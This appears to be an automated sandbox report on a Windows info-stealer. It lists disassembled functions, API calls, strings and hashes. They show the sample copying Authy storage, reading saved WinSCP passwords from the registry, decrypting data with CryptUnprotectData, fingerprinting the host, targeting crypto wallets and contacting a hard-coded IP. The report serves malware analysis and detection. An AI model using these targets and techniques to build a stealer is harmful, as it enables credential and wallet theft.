Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

CopyFileW.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0041EF6F

Strings

\files\Soft\AuthyNew, xrefs: 0041EDE7
\Authy Desktop\Local Storage\*.localstorage, xrefs: 0041E810
files\Soft\AuthyNew, xrefs: 0041EE1A
files\Soft\Authy, xrefs: 0041E8FD
\Authy Desktop\Local Storage\leveldb\, xrefs: 0041EF05
APPDATA, xrefs: 0041E7BB
\Authy Desktop\Local Storage\, xrefs: 0041E9E5
\Authy Desktop\Local Storage\leveldb\*, xrefs: 0041EC8D
\files\Soft\Authy, xrefs: 0041E8CA
\files\Soft, xrefs: 0041E886, 0041EDA3

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCreateDirectoryMultiWide$CopyFile$__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\Authy Desktop\Local Storage\leveldb\$\Authy Desktop\Local Storage\leveldb\*$\files\Soft$\files\Soft\Authy$\files\Soft\AuthyNew$files\Soft\Authy$files\Soft\AuthyNew
API String ID: 3009452187-1538576089
Opcode ID: 7ce4290dd04d6d6139153d2096a74dc4aca068b8c9d02a6b9c8b636a25f90f57
Instruction ID: 9fffadf4525bd2c083ac333686a87e8656e275cf3915418a7255b7888ec7fd12
Opcode Fuzzy Hash: 7ce4290dd04d6d6139153d2096a74dc4aca068b8c9d02a6b9c8b636a25f90f57
Instruction Fuzzy Hash: 42524BB1808380DBD730EF65C881BDBBBE9AF89704F444D2EE58947241EB799544CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 0041B810, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 276fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041B88D
_sprintf.LIBCMT ref: 0041B8DA
FindFirstFileA.KERNELBASE(?,?), ref: 0041B8F2

Strings

%s\%s, xrefs: 0041B9CD, 0041BA19
%s\*, xrefs: 0041B8CC

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindFirst__wgetenv_sprintf
String ID: %s\%s$%s\*
API String ID: 3517639957-2848263008
Opcode ID: 055a8c2aac4adb0a5436a0476902567b16a76576aaa833a5fc7e3241545f1fd2
Instruction ID: e84d73e01692a937fcb8278ce23769cccc62f2ad9502f447513b42af3e95e1a5
Opcode Fuzzy Hash: 055a8c2aac4adb0a5436a0476902567b16a76576aaa833a5fc7e3241545f1fd2
Instruction Fuzzy Hash: EFB195B15083809FD720DF60C881AEBB7E9EB95704F444D2EF18947241E7799548CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB20, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0040EB8B
FindFirstFileA.KERNELBASE(?,?), ref: 0040EBA0
_sprintf.LIBCMT ref: 0040EC57
_sprintf.LIBCMT ref: 0040EC83
PathMatchSpecA.SHLWAPI(?,?), ref: 0040ECB4
CopyFileA.KERNEL32(?,?,00000001), ref: 0040ED32

Strings

%s\%s, xrefs: 0040EC51, 0040EC9D
%s\*, xrefs: 0040EB7C

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _sprintf$File$CopyFindFirstMatchPathSpec
String ID: %s\%s$%s\*
API String ID: 1073797228-2848263008
Opcode ID: 7c51ff1c78bb79323afe99da5676c7f2d6818d4d01a20724473318cabff47a0a
Instruction ID: 3cd559b57765f387816ded045f179eb8af0ae6fe739494d685eafc44d7bda6f5
Opcode Fuzzy Hash: 7c51ff1c78bb79323afe99da5676c7f2d6818d4d01a20724473318cabff47a0a
Instruction Fuzzy Hash: 2681A5B25083809BD730DF61C881AABB7E9EF95314F444D2FF18997281E779D508CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00410340, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 156networkfileCOMMON

Download Yara Rule

APIs

DeleteUrlCacheEntry.WININET(?), ref: 004103B8
DeleteUrlCacheEntry.WININET(00000000), ref: 004103DF
InternetOpenA.WININET(004BB6C4,00000000,00000000,00000000,00000000), ref: 00410401
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0041043C
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 00410474
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00410489
InternetReadFile.WININET(00000000,?,000007FF,?), ref: 004104A3
InternetCloseHandle.WININET(00000000), ref: 004104B3
InternetCloseHandle.WININET(00000000), ref: 004104BA
InternetCloseHandle.WININET(00000000), ref: 004104C1

Strings

GET, xrefs: 0041046E

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$CacheDeleteEntryHttpOpenRequest$ConnectFileReadSend
String ID: GET
API String ID: 2421845749-1805413626
Opcode ID: d78caac32a6031125b95a6080af71cf986807d58e7994e79d10f012c794aeacd
Instruction ID: 7cf1307f9db5e9878ae89d0e043f20ff73eb375528e1574c33e1e4af38b135ab
Opcode Fuzzy Hash: d78caac32a6031125b95a6080af71cf986807d58e7994e79d10f012c794aeacd
Instruction Fuzzy Hash: D751B271609344ABD731DB10DC45B9BB7E8FB89700F104A2EF58997280DFB9A440CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00492480, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32 ref: 004924ED
LocalAlloc.KERNEL32(00000040,00000000), ref: 004924FF
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0049250B
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00492535
_memmove.LIBCMT ref: 004925A3
_memmove.LIBCMT ref: 00492635
_memset.LIBCMT ref: 00492681
LocalFree.KERNEL32(00000000), ref: 0049269D

Strings

/ , xrefs: 00492549

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
String ID: /
API String ID: 3901162126-4001269591
Opcode ID: dde0f57af63dbf9b5205601e7f3d1e1e3b3575b87c653cad2582487f8bd16fa6
Instruction ID: ca32fba6e0dd625b902435190d65c0a9c2a1543b9c3712984430e5707a9dd001
Opcode Fuzzy Hash: dde0f57af63dbf9b5205601e7f3d1e1e3b3575b87c653cad2582487f8bd16fa6
Instruction Fuzzy Hash: 3061AFB0505701EFD720DF29D984A2BBBF8FF99314F500A3EE08983641D779A944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041B590, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 211fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0041B5E1
FindFirstFileA.KERNEL32(?,?), ref: 0041B5F6
_sprintf.LIBCMT ref: 0041B69A
FindNextFileA.KERNELBASE(?,?), ref: 0041B7D5
FindClose.KERNEL32(?), ref: 0041B7E8

Strings

History, xrefs: 0041B714
%s\%s, xrefs: 0041B694
%s\*, xrefs: 0041B5D7

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File_sprintf$CloseFirstNext
String ID: %s\%s$%s\*$History
API String ID: 3618621783-2206966733
Opcode ID: a0267599da6da25de1cf93bebbb4305a1068f3deeb62d77cefc894d8a37989b6
Instruction ID: 76b2ec8c38971f12c3d8284c9000f53bcfef7d449bd0c5e41967c9f326c288b4
Opcode Fuzzy Hash: a0267599da6da25de1cf93bebbb4305a1068f3deeb62d77cefc894d8a37989b6
Instruction Fuzzy Hash: 6261B5B25083446BC320DB61DC81EEB7BADEFDA744F04491EF59582241E736E648C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00417000, Relevance: 10.6, APIs: 7, Instructions: 90processCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041702D

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

CreateToolhelp32Snapshot.KERNEL32 ref: 00417043
CloseHandle.KERNEL32(00000000), ref: 00417053
Process32First.KERNEL32(00000000,?), ref: 00417066
Process32Next.KERNEL32 ref: 00417075
Process32Next.KERNEL32 ref: 004170E2
CloseHandle.KERNEL32(00000000,00000000,?), ref: 004170EC

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process32$CloseHandleNext$AllocateCreateFirstHeapSnapshotToolhelp32_malloc
String ID:
API String ID: 3797447157-0
Opcode ID: d4c41d99061c645534db89170435915d556a33b084c6a1483c6c506c5a763cb8
Instruction ID: 2135836d77798f9c50604d49f3f72542c4dc93c97459f83ae6fef5a1776cfb42
Opcode Fuzzy Hash: d4c41d99061c645534db89170435915d556a33b084c6a1483c6c506c5a763cb8
Instruction Fuzzy Hash: B33122716083405BD720DF219D41BEB7FE8AF99344F04052EF98897241EB3ED909C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00413270, Relevance: 8.1, APIs: 5, Instructions: 568fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 004132E0
__wgetenv.LIBCMT ref: 00413300
_memmove.LIBCMT ref: 0041348D
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 004136CB

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,2D794ED1), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00413846

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__wgetenv$CopyCreateDirectoryFile_memmove
String ID:
API String ID: 2457873499-0
Opcode ID: 6b191416ec0f5539c53d3b12fb1fda3b3936cd743089bef5e0407085d973174b
Instruction ID: f0c70720498cf02b519b062bc8fa08eb36b6b8b758df70b0d8f6ea38b47e292c
Opcode Fuzzy Hash: 6b191416ec0f5539c53d3b12fb1fda3b3936cd743089bef5e0407085d973174b
Instruction Fuzzy Hash: CA326BB1809380DBD731EF65C485BDBBBE5AF99304F44492EE18D43201EB799548CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00492360, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 004923C4
GetTimeZoneInformation.KERNEL32(?), ref: 004923CF
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004923FC

Strings

UTC, xrefs: 00492429

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$System$InformationLocalSpecificZone
String ID: UTC
API String ID: 1716759327-2754919731
Opcode ID: 8daca3fe7f7afe76af06b8b478628c01a36bce74609ce7b4dd640e931eba343b
Instruction ID: d59f1eb0f8becfbe52156457f42bd622178f558e25b76293156a555318c4f0b3
Opcode Fuzzy Hash: 8daca3fe7f7afe76af06b8b478628c01a36bce74609ce7b4dd640e931eba343b
Instruction Fuzzy Hash: 1D3136B1518341DBD324CF68D941BABBBF8FF98700F004A2EF49A92240E7749508CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416200, Relevance: 6.0, APIs: 4, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00416228
LocalAlloc.KERNEL32(00000040,?), ref: 00416242
_memmove.LIBCMT ref: 0041625B
LocalFree.KERNEL32(?), ref: 00416269

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: 52b5cb7e9d9683fccfce23cd0e558f31d56e109316cbd0899879e39eb39ddb28
Instruction ID: d33bcd860eec39be862b12614f406f2b613f285aa91fc56981d17521ed732d33
Opcode Fuzzy Hash: 52b5cb7e9d9683fccfce23cd0e558f31d56e109316cbd0899879e39eb39ddb28
Instruction Fuzzy Hash: AC014075604301ABD300DF58DC45B6B77E9EBC8B04F14895DF9849B290DA74D844CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00496670, Relevance: 4.6, APIs: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,2D794ED1), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

FindFirstFileW.KERNEL32(00000000,?,?,?,2D794ED1), ref: 004966EC
FindNextFileW.KERNEL32(?,?), ref: 0049679B
FindNextFileW.KERNEL32(?,?,?,?,?), ref: 00496829

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$ByteCharMultiNextWide$First
String ID:
API String ID: 1501163664-0
Opcode ID: d917b43fba4d8f33674cf65e126e6d7e10101edb8951a24cc533958845b5fdc1
Instruction ID: 0d2b8d864ed86e80172c5fe242d0e61fb55c426dd9a101164f238c3e4891137a
Opcode Fuzzy Hash: d917b43fba4d8f33674cf65e126e6d7e10101edb8951a24cc533958845b5fdc1
Instruction Fuzzy Hash: B9518DB15083819BDB20DF65C985A9BBBE8FFD8304F454A2EF48983250EB78E504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00498990, Relevance: 4.6, APIs: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004989E1
_memmove.LIBCMT ref: 00498A91
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0049902E,?,00000000,?,00004000,?,00000000,?), ref: 00498AB5

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileWrite
String ID:
API String ID: 726942401-0
Opcode ID: 389badcafe34475b37ebccc8990e9a292970729dd20f23d84aa44defa45b3f6e
Instruction ID: 986d0415b1d1014c74def0908bc7bc2070a4c2b2779cb8c7359b06e8e5ea05ed
Opcode Fuzzy Hash: 389badcafe34475b37ebccc8990e9a292970729dd20f23d84aa44defa45b3f6e
Instruction Fuzzy Hash: 2D41BDB2600B019BC768DF19D980A27BBE9FBD5310B54493FE48387A41D639F405CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044E950, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(004D4224,00000000,00462DAF,?,?,?,?,?,?), ref: 0044E985

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 65adae5f8bfe4fee9032333fefd55fc3f2d6cb7609ae2e93eb03c802d01f919e
Instruction ID: ff61be3a33aee084a537e90de765e6727d4fb5985f9e6136672ec7b91c2a4201
Opcode Fuzzy Hash: 65adae5f8bfe4fee9032333fefd55fc3f2d6cb7609ae2e93eb03c802d01f919e
Instruction Fuzzy Hash: 71218DB0903621AFE750DF6ABD4921A37E4BB44744B04417BEC05E6376F33858048B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00491AC0, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32 ref: 00491AF6

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fbd7f1f31775140c2410dfef175017acd0f32cf79ceab7fe4c8529fcaa8b23d5
Instruction ID: 31d172919f5a663b823a1a99c2b3aa783a5a2d09b84c0491761752d047d5da8e
Opcode Fuzzy Hash: fbd7f1f31775140c2410dfef175017acd0f32cf79ceab7fe4c8529fcaa8b23d5
Instruction Fuzzy Hash: EB0162711043019FD720DF14D454BEBBBE4EB95304F008A1EE4C987250EBB89548CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00410B86, Relevance: 197.8, APIs: 43, Strings: 69, Instructions: 1813sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00414C90: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,747C81D0,0040524C,?,00000000), ref: 00414CB7

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00410FC2
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00411002
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411042
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041108F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 004110CF
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00411118
SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0041115D
SetCurrentDirectoryA.KERNEL32(?,004D10CC,00000000,000000FF), ref: 00411228

Part of subcall function 0049D0CC: __wfsopen.LIBCMT ref: 0049D0D9

__time64.LIBCMT ref: 00411259

Part of subcall function 0049D44C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004959D5,00000000), ref: 0049D457
Part of subcall function 0049D44C: __aulldiv.LIBCMT ref: 0049D477

__localtime64_s.LIBCMT ref: 0041126B
_asctime_s.LIBCMT ref: 00411282
_fprintf.LIBCMT ref: 004112B1
_fprintf.LIBCMT ref: 004112E0
_fprintf.LIBCMT ref: 0041130D
_fprintf.LIBCMT ref: 00411353
_fprintf.LIBCMT ref: 00411399
GetCurrentProcessId.KERNEL32 ref: 004113BA
_fprintf.LIBCMT ref: 004113E0
_fprintf.LIBCMT ref: 004114C2
_fprintf.LIBCMT ref: 00411630
_fprintf.LIBCMT ref: 0041170A
_fprintf.LIBCMT ref: 004117E4

Part of subcall function 00491CE0: _memset.LIBCMT ref: 00491D51
Part of subcall function 00491CE0: GetUserDefaultLocaleName.KERNEL32(?,00000055,0000000F,00000000), ref: 00491D60

_fprintf.LIBCMT ref: 004118BE
_fprintf.LIBCMT ref: 00411998
_fprintf.LIBCMT ref: 00411A72

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 00411B4C
_fprintf.LIBCMT ref: 00411C15
_fprintf.LIBCMT ref: 00411C89
_fprintf.LIBCMT ref: 00411D63
_fprintf.LIBCMT ref: 00411E3D
_fprintf.LIBCMT ref: 00411F17
_fprintf.LIBCMT ref: 00411FE0
_fprintf.LIBCMT ref: 0041202F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041208E
_fprintf.LIBCMT ref: 004120DC
_fprintf.LIBCMT ref: 0041212B
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00412189
_fprintf.LIBCMT ref: 0041141A

Part of subcall function 00491030: GetCurrentProcess.KERNEL32(?,00000000,?,?,004123DF,?,007EC828,00000000,?,007EC778,00000000), ref: 00491042
Part of subcall function 00491030: IsWow64Process.KERNEL32(00000000,?,?,004123DF,?,007EC828,00000000,?,007EC778,00000000), ref: 00491049

Part of subcall function 00490F30: _memset.LIBCMT ref: 00490F6D
Part of subcall function 00490F30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 00490F8B
Part of subcall function 00490F30: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00490FAD
Part of subcall function 00490F30: RegCloseKey.ADVAPI32(?), ref: 00490FB8
Part of subcall function 00490F30: CharToOemA.USER32(?,?), ref: 00490FCB

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 004121CD
SetCurrentDirectoryA.KERNEL32(00000000), ref: 00412210
SetCurrentDirectoryA.KERNEL32(00000000), ref: 0041225C
SetCurrentDirectoryA.KERNEL32(00691058,ccount,00000000,?,00000000,007EC718,00000000,007EC6D8,00000000,?,00000000,007EC798,00000000,?,?,007EC848), ref: 00412652

Part of subcall function 00414AB0: _memset.LIBCMT ref: 00414ABC

Sleep.KERNEL32(00014FF0,382E3332), ref: 00412952

Strings

;, xrefs: 00410EC9
[Hardware], xrefs: 00411BD5
/mozglue.dll, xrefs: 00410BC2
Version: %s, xrefs: 004112AB
=, xrefs: 00410E9C
VideoCard: , xrefs: 00411EDD
\softokn3.dll, xrefs: 00410E68
[Software], xrefs: 00412098
logs, xrefs: 004128B5
\mozglue.dll, xrefs: 00410C1F
B, xrefs: 00412806
RAM: , xrefs: 00411E03
23.88.105.196, xrefs: 00410BCE, 00410C91, 00410D54, 00410E17, 00410EDA, 004128E1, 004128F6, 004128FB
\files\, xrefs: 004122B0
h#, xrefs: 00412913
Display Resolution: , xrefs: 004117AA
TimeZone: , xrefs: 00411B12
8/v, xrefs: 004110AA
.zip, xrefs: 004126D4
Work Dir: %s , xrefs: 00411414
Local Time: , xrefs: 00411A38
}F, xrefs: 00410EFE
h0, xrefs: 00412903
CPU Count: , xrefs: 00411D29
u?, xrefs: 00410D16
MachineID: %s, xrefs: 00411300
/, xrefs: 00412115
Keyboard Languages: , xrefs: 0041195E
HWID: %s, xrefs: 0041138C
;, xrefs: 00410F8B
Z, xrefs: 004111E1
0, xrefs: 004122E1
Y', xrefs: 00412452
E, xrefs: 0041282E
/msvcp140.dll, xrefs: 00410C85
:, xrefs: 004126A9
>, xrefs: 00410BBD
files\information.txt, xrefs: 00411248
/nss3.dll, xrefs: 00410D48
Date: %s, xrefs: 004112DA
C, xrefs: 00412818
m!, xrefs: 0041293E
<, xrefs: 004126E2
\msvcp140.dll, xrefs: 00410CE2
F, xrefs: 004128E6
ccount, xrefs: 004125FB
;, xrefs: 004126C7
Path: %s , xrefs: 004113DA
L&, xrefs: 0041255F
[Processes], xrefs: 00411FA0
\files\Wallets, xrefs: 00412291
*.*, xrefs: 004127C8
?G, xrefs: 00410E3C
User Name: , xrefs: 004116D0
/vcruntime140.dll, xrefs: 00410ECE
Windows: , xrefs: 00411456
Processor: , xrefs: 00411C4F
h=, xrefs: 00410D43
/softokn3.dll, xrefs: 00410E0B
\nss3.dll, xrefs: 00410DA5
Display Language: , xrefs: 00411884
8@, xrefs: 00410C53
Computer Name: , xrefs: 004115F6
\files, xrefs: 00412234, 004127D7
-=, xrefs: 00410F5E
X(, xrefs: 00412353
\vcruntime140.dll, xrefs: 00410F2A
+>, xrefs: 00410C80
GUID: %s, xrefs: 00411346

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Directory$Create$Current$Process_memset$FileIos_base_dtorTimestd::ios_base::_$CharCloseDefaultLocaleNameOpenQuerySleepSystemUserValueWow64__aulldiv__ftbuf__localtime64_s__lock_file__output_l__stbuf__time64__wfsopen_asctime_s
String ID: [Software]$*.*$.zip$/$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$0$23.88.105.196$8/v$:$;$<$B$C$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $E$F$GUID: %s$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs$ ;$+>$-=$8@$?G$L&$X($Y'$Z$h#$h0$h=$m!$u?$}F$;$=$>
API String ID: 4234026189-3363113091
Opcode ID: afcf5bebe2402963074d7130e4d1b672e6bbd167c205d5fc785b8a12446e4f06
Instruction ID: 287dce039ab496ef586ae6d024511396016bdd25e4ef2574f01ac8e6584df064
Opcode Fuzzy Hash: afcf5bebe2402963074d7130e4d1b672e6bbd167c205d5fc785b8a12446e4f06
Instruction Fuzzy Hash: 2DF2A5B18083C0DBD735EB55D885BDF77E9AB95304F00092FE18D56252EBB89184CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0041C310, Relevance: 70.3, APIs: 25, Strings: 15, Instructions: 324registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041C36A
_memset.LIBCMT ref: 0041C38C
_memset.LIBCMT ref: 0041C3A6
_memset.LIBCMT ref: 0041C3C0
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C3EB
RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C419
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C42C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C43D
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C459
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C47E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000103,2D794ED1), ref: 0041C495
_fprintf.LIBCMT ref: 0041C506
_fprintf.LIBCMT ref: 0041C511
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?), ref: 0041C53B
_fprintf.LIBCMT ref: 0041C54F
RegGetValueA.ADVAPI32 ref: 0041C581
_fprintf.LIBCMT ref: 0041C5AF
_fprintf.LIBCMT ref: 0041C5D8
_fprintf.LIBCMT ref: 0041C5E6
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?), ref: 0041C610
_fprintf.LIBCMT ref: 0041C624

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,?,?,?,?,?,?,?), ref: 0041C666

Part of subcall function 0041BBF0: GetProcessHeap.KERNEL32(00000008,?), ref: 0041BCB2
Part of subcall function 0041BBF0: HeapAlloc.KERNEL32(00000000), ref: 0041BCB5
Part of subcall function 0041BBF0: GetProcessHeap.KERNEL32(00000000,2D794ED1), ref: 0041BCCB
Part of subcall function 0041BBF0: HeapFree.KERNEL32(00000000), ref: 0041BCCE

Part of subcall function 00404F50: _memmove.LIBCMT ref: 00404F8B

_fprintf.LIBCMT ref: 0041C6DF
RegEnumKeyExA.ADVAPI32 ref: 0041C70F
RegCloseKey.ADVAPI32(?), ref: 0041C75A

Strings

UserName, xrefs: 0041C602
:%s, xrefs: 0041C5A9
Login: , xrefs: 0041C5E0
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0041C44F
Password, xrefs: 0041C651
HostName, xrefs: 0041C52D
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0041C3D5
PortNumber, xrefs: 0041C56B
UseMasterPassword, xrefs: 0041C40E
Host: , xrefs: 0041C50B
Password: %s, xrefs: 0041C6D9
:22, xrefs: 0041C5D2
Soft: WinSCP, xrefs: 0041C500
Security, xrefs: 0041C413
passwords.txt, xrefs: 0041C4A0

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Value$CloseHeap_memset$EnumOpenProcess$AllocFree__ftbuf__lock_file__output_l__stbuf_memmove
String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 651107544-1600676177
